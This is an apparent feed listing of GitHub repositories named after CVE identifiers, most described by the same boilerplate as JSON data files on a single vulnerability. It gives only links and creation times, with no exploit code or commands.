**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14438 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14438](https://github.com/Live-Hack-CVE/CVE-2017-14438) create time: 2022-12-23T05:32:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-7605 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-7605](https://github.com/Live-Hack-CVE/CVE-2017-7605) create time: 2022-12-23T05:32:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14321 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14321](https://github.com/Live-Hack-CVE/CVE-2020-14321) create time: 2022-12-23T06:15:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10710 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10710](https://github.com/Live-Hack-CVE/CVE-2020-10710) create time: 2022-12-23T06:15:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43304 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43304](https://github.com/Live-Hack-CVE/CVE-2021-43304) create time: 2022-12-23T06:15:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42388 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42388](https://github.com/Live-Hack-CVE/CVE-2021-42388) create time: 2022-12-23T06:15:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43305](https://github.com/Live-Hack-CVE/CVE-2021-43305) create time: 2022-12-23T06:04:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25219 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25219](https://github.com/Live-Hack-CVE/CVE-2021-25219) create time: 2022-12-23T05:33:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4037 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4037](https://github.com/Live-Hack-CVE/CVE-2021-4037) create time: 2022-12-23T05:33:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4189 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4189](https://github.com/Live-Hack-CVE/CVE-2021-4189) create time: 2022-12-23T05:32:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33980 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33980](https://github.com/Live-Hack-CVE/CVE-2022-33980) create time: 2022-12-23T06:15:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28665 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28665](https://github.com/Live-Hack-CVE/CVE-2022-28665) create time: 2022-12-23T06:15:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28384 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28384](https://github.com/Live-Hack-CVE/CVE-2022-28384) create time: 2022-12-23T06:15:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28664 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28664](https://github.com/Live-Hack-CVE/CVE-2022-28664) create time: 2022-12-23T06:03:57Z

**no description** : [Ki11i0n4ir3/CVE-2022-0739](https://github.com/Ki11i0n4ir3/CVE-2022-0739) create time: 2022-12-23T05:35:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32868 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32868](https://github.com/Live-Hack-CVE/CVE-2022-32868) create time: 2022-12-23T05:33:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33746](https://github.com/Live-Hack-CVE/CVE-2022-33746) create time: 2022-12-23T05:33:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42890 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42890](https://github.com/Live-Hack-CVE/CVE-2022-42890) create time: 2022-12-23T05:33:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38791 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38791](https://github.com/Live-Hack-CVE/CVE-2022-38791) create time: 2022-12-23T05:33:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38533 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38533](https://github.com/Live-Hack-CVE/CVE-2022-38533) create time: 2022-12-23T05:33:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36033 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36033](https://github.com/Live-Hack-CVE/CVE-2022-36033) create time: 2022-12-23T05:33:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39046 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39046](https://github.com/Live-Hack-CVE/CVE-2022-39046) create time: 2022-12-23T05:33:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1552 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1552](https://github.com/Live-Hack-CVE/CVE-2022-1552) create time: 2022-12-23T05:33:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41704 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41704](https://github.com/Live-Hack-CVE/CVE-2022-41704) create time: 2022-12-23T05:33:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28383 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28383](https://github.com/Live-Hack-CVE/CVE-2022-28383) create time: 2022-12-23T05:32:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4141 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4141](https://github.com/Live-Hack-CVE/CVE-2022-4141) create time: 2022-12-23T05:32:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42781 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42781](https://github.com/Live-Hack-CVE/CVE-2022-42781) create time: 2022-12-23T05:32:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42780 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42780](https://github.com/Live-Hack-CVE/CVE-2022-42780) create time: 2022-12-23T05:32:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42779 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42779](https://github.com/Live-Hack-CVE/CVE-2022-42779) create time: 2022-12-23T05:32:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42778 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42778](https://github.com/Live-Hack-CVE/CVE-2022-42778) create time: 2022-12-23T05:32:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42777 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42777](https://github.com/Live-Hack-CVE/CVE-2022-42777) create time: 2022-12-23T05:32:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42776 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42776](https://github.com/Live-Hack-CVE/CVE-2022-42776) create time: 2022-12-23T05:32:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42775 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42775](https://github.com/Live-Hack-CVE/CVE-2022-42775) create time: 2022-12-23T05:31:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42761 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42761](https://github.com/Live-Hack-CVE/CVE-2022-42761) create time: 2022-12-23T05:31:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42760 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42760](https://github.com/Live-Hack-CVE/CVE-2022-42760) create time: 2022-12-23T05:31:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42763 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42763](https://github.com/Live-Hack-CVE/CVE-2022-42763) create time: 2022-12-23T05:31:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39099 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39099](https://github.com/Live-Hack-CVE/CVE-2022-39099) create time: 2022-12-23T05:31:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42762 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42762](https://github.com/Live-Hack-CVE/CVE-2022-42762) create time: 2022-12-23T05:31:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3690 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3690](https://github.com/Live-Hack-CVE/CVE-2022-3690) create time: 2022-12-23T05:31:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3928](https://github.com/Live-Hack-CVE/CVE-2019-3928) create time: 2022-12-23T05:04:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20172 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20172](https://github.com/Live-Hack-CVE/CVE-2019-20172) create time: 2022-12-23T05:03:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39434 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39434](https://github.com/Live-Hack-CVE/CVE-2021-39434) create time: 2022-12-23T05:16:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33716 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33716](https://github.com/Live-Hack-CVE/CVE-2021-33716) create time: 2022-12-23T05:04:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27343 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27343](https://github.com/Live-Hack-CVE/CVE-2021-27343) create time: 2022-12-23T05:03:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30045 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30045](https://github.com/Live-Hack-CVE/CVE-2021-30045) create time: 2022-12-23T05:03:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45450 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45450](https://github.com/Live-Hack-CVE/CVE-2021-45450) create time: 2022-12-23T04:19:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44942 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44942](https://github.com/Live-Hack-CVE/CVE-2022-44942) create time: 2022-12-23T05:16:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45010 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45010](https://github.com/Live-Hack-CVE/CVE-2022-45010) create time: 2022-12-23T05:16:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33875 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33875](https://github.com/Live-Hack-CVE/CVE-2022-33875) create time: 2022-12-23T05:16:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37454 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37454](https://github.com/Live-Hack-CVE/CVE-2022-37454) create time: 2022-12-23T05:16:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40918](https://github.com/Live-Hack-CVE/CVE-2022-40918) create time: 2022-12-23T05:16:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30307 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30307](https://github.com/Live-Hack-CVE/CVE-2022-30307) create time: 2022-12-23T05:16:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21618](https://github.com/Live-Hack-CVE/CVE-2022-21618) create time: 2022-12-23T05:16:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39399 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39399](https://github.com/Live-Hack-CVE/CVE-2022-39399) create time: 2022-12-23T05:16:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21628 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21628](https://github.com/Live-Hack-CVE/CVE-2022-21628) create time: 2022-12-23T05:16:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21626 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21626](https://github.com/Live-Hack-CVE/CVE-2022-21626) create time: 2022-12-23T05:16:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21624 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21624](https://github.com/Live-Hack-CVE/CVE-2022-21624) create time: 2022-12-23T05:16:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21619 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21619](https://github.com/Live-Hack-CVE/CVE-2022-21619) create time: 2022-12-23T05:16:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35255 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35255](https://github.com/Live-Hack-CVE/CVE-2022-35255) create time: 2022-12-23T05:16:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43548 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43548](https://github.com/Live-Hack-CVE/CVE-2022-43548) create time: 2022-12-23T05:16:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43553 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43553](https://github.com/Live-Hack-CVE/CVE-2022-43553) create time: 2022-12-23T05:16:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38266 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38266](https://github.com/Live-Hack-CVE/CVE-2022-38266) create time: 2022-12-23T05:16:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35843 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35843](https://github.com/Live-Hack-CVE/CVE-2022-35843) create time: 2022-12-23T05:16:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30305](https://github.com/Live-Hack-CVE/CVE-2022-30305) create time: 2022-12-23T05:15:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45326 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45326](https://github.com/Live-Hack-CVE/CVE-2022-45326) create time: 2022-12-23T05:15:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40603 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40603](https://github.com/Live-Hack-CVE/CVE-2022-40603) create time: 2022-12-23T05:04:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41325 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41325](https://github.com/Live-Hack-CVE/CVE-2022-41325) create time: 2022-12-23T05:04:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34361 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34361](https://github.com/Live-Hack-CVE/CVE-2022-34361) create time: 2022-12-23T05:04:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43867 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43867](https://github.com/Live-Hack-CVE/CVE-2022-43867) create time: 2022-12-23T05:04:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46383 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46383](https://github.com/Live-Hack-CVE/CVE-2022-46383) create time: 2022-12-23T05:04:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46382 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46382](https://github.com/Live-Hack-CVE/CVE-2022-46382) create time: 2022-12-23T05:04:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44289 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44289](https://github.com/Live-Hack-CVE/CVE-2022-44289) create time: 2022-12-23T05:04:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43363 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43363](https://github.com/Live-Hack-CVE/CVE-2022-43363) create time: 2022-12-23T05:04:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43285 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43285](https://github.com/Live-Hack-CVE/CVE-2022-43285) create time: 2022-12-23T05:04:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23470 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23470](https://github.com/Live-Hack-CVE/CVE-2022-23470) create time: 2022-12-23T05:04:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46161 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46161](https://github.com/Live-Hack-CVE/CVE-2022-46161) create time: 2022-12-23T05:04:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12128 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12128](https://github.com/Live-Hack-CVE/CVE-2017-12128) create time: 2022-12-23T03:54:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12129](https://github.com/Live-Hack-CVE/CVE-2017-12129) create time: 2022-12-23T03:54:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14432 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14432](https://github.com/Live-Hack-CVE/CVE-2017-14432) create time: 2022-12-23T03:54:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14435 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14435](https://github.com/Live-Hack-CVE/CVE-2017-14435) create time: 2022-12-23T03:54:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12127 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12127](https://github.com/Live-Hack-CVE/CVE-2017-12127) create time: 2022-12-23T03:54:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12126](https://github.com/Live-Hack-CVE/CVE-2017-12126) create time: 2022-12-23T03:54:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12125 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12125](https://github.com/Live-Hack-CVE/CVE-2017-12125) create time: 2022-12-23T03:54:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12124 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12124](https://github.com/Live-Hack-CVE/CVE-2017-12124) create time: 2022-12-23T03:54:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12123 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12123](https://github.com/Live-Hack-CVE/CVE-2017-12123) create time: 2022-12-23T03:53:37Z

